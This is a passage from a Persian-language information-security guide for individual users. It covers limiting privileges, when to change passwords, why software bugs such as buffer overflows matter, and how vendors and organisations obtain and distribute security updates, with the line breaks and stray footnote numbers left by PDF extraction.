‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺳﻴـﺴﺘﻢ ﺭﺍ‬
‫ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻬﺎﺟﻢ ﻧﻴﺰ ﺍﺯ ﺁﺳﻴﺐ ﻭﺍﺭﺩﻩ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻣﻲﻛﺎﻫﺪ‪.‬‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺗﻨﺎﻭﺏ ﺍﻳـﻦ‬
‫ﺗﻐﻴﻴﺮ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﺍﻧﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣـﺎﻧﻲ ﻛﻮﺗـﺎﻩ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ؛ ﺍﻣﺎ ﻋﺪﻩﺍﻱ ﻣﻌﺘﻘﺪﻧـﺪ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﻧﺪ ﻭ ﻳـﺎ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﻓﺮﺍﻣــﻮﺵ ﺷــﺪﻥ ﺩﺭ ﺟــﺎﻳﻲ ﻧﻮﺷــﺘﻪ ﺷــﻮﻧﺪ‪ .‬ﺑــﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ‬
‫ﻣﻌﻤﻮﻟﻲ ﻧﻜﺎﺕ ﺯﻳﺮ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﻧﺪ‪:‬‬
‫•‬
‫ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺩﺭ ﻣﻌﺮﺽ ﺳـﺮﻗﺖ ﺑـﻮﺩﻩ‬
‫ﺳﺮﻳﻌﹰﺎ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﻨﻴﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﺍ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠـﻲ ﺑـﻪ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ‬
‫ﺩﺍﺩﻩﺍﻳﺪ ﺑﺴﺮﻋﺖ ﺁﻧﺮﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﺻﺤﻴﺤﻲ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨﺎﺏ‬
‫ﻛﺮﺩ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻭﺍﻗﻌﹰﺎ ﭼـﺎﺭﻩﺍﻱ ﺟـﺰ ﺁﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﻋـﻮﺽ ﻛﻨﻴـﺪ‪ .‬ﻣﻌﻨـﻲ‬
‫ﻛﻠﻤﺔ "ﻣﺘﻨﺎﻭﺏ" ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ‪ ،‬ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ‪.‬‬
‫ﺷﺎﻳﺪ ﺩﻭﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ‪ ۶‬ﻣﺎﻩ ﺗﺎ ﻳﻜﺴﺎﻝ ﺑـﻪ ﻧﻈـﺮ ﻣﻨﺎﺳـﺐ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﺳﻴﺎﺳﺖ ﺳﺎﺯﻣﺎﻧﻲ ﺷﻤﺎ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺩﻗﻴﻘﺘﺮ ﺍﺳـﺖ ﺍﺯ‬
‫ﺁﻥ ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ‪.‬‬
‫‪Privilege‬‬
‫‪Root Privilege‬‬
‫‪Administrator Privilege‬‬
‫‪26‬‬
‫‪27‬‬
‫‪28‬‬
‫‪٦٥‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﻻ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺍﺳﺖ‪ .٣٠‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻏﻠﺐ ﻣﺤﺼﻮﻻﺕ ﻣﻌﻤﻮ ﹰ‬
‫ﻫﺰﻳﻨﻪﺍﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
‫ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﻓﻨﻮﻧﻲ ﻣﻲﭘـﺮﺩﺍﺯﻳﻢ ﻛـﻪ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ‬
‫ﻛﺎﻫﺶ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ‬
‫ﺑﺮﺍﺑﺮ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻣﻘﺪﻣﻪ‬
‫ﺍﺻﻞ ﺍﻭﻝ‪ :‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﺻﻞ ﺩﻭﻡ‪ :‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺷﻜﺎﻝ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺍﺻﻞ ﺍﻭﻝ ﺑﺪﻳﻬﻲ ﺍﺳﺖ؛ ﻭ ﺍﺻﻞ ﺩﻭﻡ ﻧﻴـﺰ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ‬
‫ﻼ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ‬
‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺍﻓﺮﺍﺩ ﺑﺪﻭﻥ ﻧﻘـﺺ ﻧﻴـﺴﺘﻨﺪ ﻛـﺎﻣ ﹰ‬
‫ﺍﺳﺖ‪ .‬ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﭼـﺮﺍ ﺍﻳـﻦ ﺣﺠـﻢ ﺯﻳـﺎﺩ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﺷﻜﺎﻻﺕ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻫﻨﮕﺎﻡ ﺗﻮﺳﻌﻪ ﺑﺮﻧﺎﻣﻪ‬
‫‪٢٩‬‬
‫ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻻﺗﻲ ﻧﻈﻴﺮ ﺳـﺮﺭﻳﺰ ﺷـﺪﻥ ﺑـﺎﻓﺮ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻧﻴﻤـﻲ ﺍﺯ‬
‫ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻪﺍﻧﺪ‪.‬‬
‫ﻭﻗﺘﻲ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻓﺮﻭﺷـﻨﺪﺓ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣﺮﺍﺟﻌـﻪ ﻣـﻲﻛﻨﻴـﺪ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺭﺍ ﺗﻌﻴـﻴﻦ‬
‫ﻣﻲﻧﻤﺎﻳﻴﺪ ﻭ ﺳﭙﺲ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ‬
‫ﻼ‬
‫ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺭﺍ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ‪ .‬ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﻛـﺎﻣ ﹰ‬
‫ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺷـﻤﺎ‬
‫ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﻭﺿﻮﺡ ﻛﻤﺘﺮﻱ ﺩﺍﺭﺩ‪ .‬ﻭﻗﺘﻲ ﺷﻤﺎ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ‬
‫ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻳﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ‪ download‬ﻣﻲﻛﻨﻴـﺪ ﻭ ﺩﺭ ﻣﺮﺣﻠـﺔ‬
‫ﺑﻌﺪ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧـﻮﻉ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻣﻜـﺎﻥ‬
‫ﺩﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ‪ download‬ﻛﺮﺩﻩﺍﻳـﺪ ﺑـﺴﺎﺩﮔﻲ ﻭ ﺩﺭ ﻳـﻚ‬
‫ﻣﺮﺣﻠﻪ ﺍﺟﺮﺍ ﺷﻮﺩ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﺷﺪﻥ ﻧﻴﺎﺯﻣﻨـﺪ ﺍﺟـﺮﺍﻱ‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺧﺎﺻﻲ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻌﺪ ﺍﺯ ‪ download‬ﺷﺪﻥ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ‬
‫ﻧﺼﺐ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﻻ ﺍﺯ ﺳﻪ ﺭﻭﺵ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬
‫‪.۱‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ‬
‫ﻻ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؟‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻣﻲﺧﺮﻳﺪﻳﺪ‪ ،‬ﺗﺎ ﺯﻣـﺎﻥ‬
‫ﻋﺮﺿﺔ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺁﻥ ﺑﻪ ﺑﺎﺯﺍﺭ ﻫﻴﭻ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ‬
‫ﻧﻤﻲﺷﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ ﺑﺪﻻﻳﻞ ﻣﺨﺘﻠﻒ ‪ -‬ﺑﺨﺼﻮﺹ ﺑﻪ ﺩﻟﻴـﻞ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘــﻲ ‪ -‬ﺑﻴــﺸﺘﺮ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎ ﺑــﺼﻮﺭﺕ ﻣــﻨﻈﻢ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑـﺮﺍﻱ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻣﺜـﻞ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ‪،‬‬
‫"ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻨﻈﻢ" ﺑﻪ ﻣﻌﻨـﻲ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺼﻮﺭﺕ ﺭﻭﺯﺍﻧـﻪ‬
‫‪Buffer Overflow‬‬
‫‪29‬‬
‫‪۳۰‬‬
‫ﺑـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻧﻈﻴـﺮ ‪،Microsoft Windows‬‬
‫ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ "‪ "Windows Update‬ﻣﻨﺘـﺸﺮ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛـﺮﺩﻩ ﻭ‬
‫ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺍﺋـﻪ‬
‫ﻣﻲﻧﻤﺎﻳـﺪ‪ ،‬ﻭ ﺁﻧﮕـﺎﻩ ﺷـﻤﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ‪،‬‬
‫‪ download‬ﻭ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ﺍﻛﺘﺒﺮ ‪ ۲۰۰۳‬ﻭ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻱ ﺩﺭ ‪Microsoft‬‬
‫‪ ،Windows‬ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﻧﺘﻴﺠــﻪﮔﻴــﺮﻱ ﻛــﺮﺩ ﻛــﻪ ﺷــﺎﻳﺪ ﻏﻴــﺮ‬
‫ﻭﺍﻗﻊﺑﻴﻨﺎﻧﻪ ﻭ ﻧﺎﻣﻌﻤﻮﻝ ﺑﺎﺷﺪ ﻛﻪ ﺗﻮﻗﻊ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺻـﻠﻪﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻄﻮﺭ ﻫﻔﺘﮕﻲ ﻧـﺼﺐ ﻛﻨﻨـﺪ؛ ﻭ ﻟـﺬﺍ ﺍﺯ ﺁﻥ ﭘـﺲ ﻭﺻـﻠﻪﻫـﺎ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﻣﺎﻫﺎﻧﻪ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺟﺪﻱ‬
‫ﻭ ﻓﻮﺭﻱ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﺑـﺮﺍﻱ‬
‫ﺭﻓــﻊ ﺍﺷــﻜﺎﻻﺕ ﻭ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭ‪،‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﺧـﺪﻣﺎﺕ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﻗﺴﻤﺖ "‪ "Support‬ﻳـﺎ "‪"Download‬‬
‫ﺍﺻﻼﺣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﻴﺎﺑﻴﺪ‪.‬‬
‫‪٦٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪.۲‬‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺵ ﻓـﻮﻕ‬
‫‪ download‬ﻣﻲﺷﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌـﻲ ﺭﺍ‬
‫‪ download‬ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﻨﻬـﺎ‬
‫‪ ۵۰۰‬ﻛﻴﻠﻮ ﺑﺎﻳﺖ ﺣﺠﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ‪ -‬ﻛﻪ ﺍﻧﺪﺍﺯﺓ ﻛﻮﭼﻜﻲ‬
‫ﺑﺮﺍﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؛‬
‫ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﻳﻦ ﻓﻘﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‬
‫ﻭﺍﻗﻌﻲ ﺭﺍ ‪ download‬ﻣـﻲﻛﻨـﺪ ﻭ ﺳـﭙﺲ ﺁﻧـﺮﺍ ﻧـﺼﺐ‬
‫ﻣﻲ ﻧﻤﺎﻳﺪ؛ ﻭ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﺷﺎﻳﺪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺩﺭ ﺣﺪﻭﺩ‬
‫‪ ۳۰‬ﻣﮕﺎ ﺑﺎﻳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫‪.۳‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺍﺭﺍﻱ ﺗﻮﺍﺑﻊ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳـﻒ ﺷـﺪﻩﺍﻱ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺑﻪ ﺑﺮﺭﺳـﻲ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ‬
‫ﺍﺭﺍﺋــﻪﺷــﺪﻩ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ ﻭ ﺑــﺎ ﺍﺟــﺎﺯﺓ ﻛــﺎﺭﺑﺮ ﺁﻧﻬــﺎ ﺭﺍ‬
‫‪ download‬ﻭ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭﺣﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‬
‫ﺭﺍﻩ ﺍﻭﻝ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺗﻨﻬـﺎ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺐ‬
‫‪ download‬ﻛــﺮﺩﻥ ﻭ ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔﺬﺍﺷــﺘﻦ ﻭﺻــﻠﻪﻫــﺎ ﻭ‬
‫ﺍﺻﻼﺣﻬﺎﻱ ‪download‬ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫•‬
‫ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺍﺭﺍﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺑﺎﺷﺪ‪ ،‬ﺭﺍﻫﺒـﺮ ﻓﻨـﻲ‬
‫ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ ‪ download‬ﻭ ﻧــﺼﺐ ﺑــﺴﺘﻪﻫــﺎﻱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﺩ‪.‬‬
‫•‬
‫ﻛﻠﻮﭘﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻳــﺎ ﮔﺮﻭﻫﻬــﺎﻱ ﺩﻳﮕــﺮ ﻣــﻲﺗﻮﺍﻧﻨــﺪ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ‪ download‬ﻛﻨﻨـﺪ ﻭ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺍﻋﻀﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫•‬
‫ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ )‪ISP‬ﻫـﺎ(‪ ٣١‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑـــﺴﺘﻪﻫـــﺎﻱ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻣﺤـــﺼﻮﻻﺕ ﺭﺍﻳـــﺞ ﻭ‬
‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺭﺍ ﺗﻬﻴـﻪ ﻭ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ‬
‫ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺗﻮﺯﻳـﻊ ﻛﻨﻨـﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﻧﻴﺎﺯﻣﻨـﺪﻱ‬
